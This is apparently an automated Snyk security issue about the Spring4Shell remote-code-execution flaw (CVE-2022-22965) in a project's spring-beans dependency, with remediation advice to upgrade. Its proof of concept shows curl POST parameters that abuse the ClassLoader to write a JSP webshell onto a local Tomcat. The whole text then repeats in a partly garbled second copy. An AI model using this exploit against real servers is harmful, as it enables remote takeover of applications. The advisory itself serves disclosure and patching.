Package Name: org.springframework:spring-beans
Package Version: ['5.2.19.RELEASE']
Package Manager: maven
Target File: todolist-web-common/pom.xml
Severity Level: critical
Snyk ID: SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751
Snyk CVE: CVE-2022-22965
Snyk CWE: CWE-94
Link to issue in Snyk: https://app.snyk.io/org/rhicksiii91/project/c26ba307-fafe-4ac3-a7ea-4c53e9d22e2c
Snyk Description: ## Overview
org.springframework:spring-beans is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.
Affected versions of this package are vulnerable to Remote Code Execution via manipulation of ClassLoader that is achievable with a POST HTTP request. This could allow an attacker to execute a webshell on a victim's application (TomCat), or download arbitrary files from the server (Payara/Glassfish).
Note:
- Current public exploits require victim applications to be built with JRE version 9 (or above) and to be deployed on either Tomcat, Payara or Glassfish.
- However, we have confirmed that it is technically possible for additional exploits to work under additional application configurations as well.
- As such while we recommend users prioritise first remediating against the configuration described above, for full protection we also recommend upgrading all vulnerable versions to the fixed
spring-beans version regardless of the application configuration.
Update Log
- 31/03/2022 - Severity was raised from 8.1 to 9.8
- 08/04/2022 - Advisory was updated to reflect that Snyk's security research team was able to author a working PoC of this vulnerability against applications that are deployed on Payara (which is based on Glassfish).
PoC
1/ docker run -p 8888:8080 --rm --interactive --tty --name vm1 tomcat:9.0
2/ ./mvnw install
3/ docker cp target/handling-form-submission-complete.war vm1:/usr/local/tomcat/webapps
4/ curl -X POST \
-H "pre:<%" \
-H "post:;%>" \
-F 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{pre}iSystem.out.println(123)%{post}i' \
-F 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp' \
-F 'class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/handling-form-submission-complete' \
-F 'class.module.classLoader.resources.context.parent.pipeline.first.prefix=rce' \
-F 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' \
http://localhost:8888/handling-form-submission-complete/greeting
5/ curl http://localhost:8888/handling-form-submission-complete/rce.jspRemediation
Upgrade org.springframework:spring-beans to version 5.2.20, 5.3.18 or higher.
References
Package Name: org.springframework:spring-beans
Package Version: ['5.2.19.RELEASE']
Package Manager: maven
Target File: todolist-web-common/pom.xml
Severity Level: critical
Snyk ID: SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751
Snyk CVE: CVE-2022-22965
Snyk CWE: CWE-94
Link to issue in Snyk: https://app.snyk.io/org/rhicksiii91/project/c26ba307-fafe-4ac3-a7ea-4c53e9d22e2c
Snyk Description: ## Overview
org.springframework:spring-beans is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.
Affected versions of this package are vulnerable to Remote Code Execution via manipulation of
ClassLoaderthat is achievable with a POST HTTP request. This could allow an attacker to execute a webshell on a victim's application (TomCat), or download arbitrary files from the server (Payara/Glassfish).Note:
spring-beansversion regardless of the application configuration.Update Log
PoC
Remediation
Upgrade
org.springframework:spring-beansto version 5.2.20, 5.3.18 or higher.References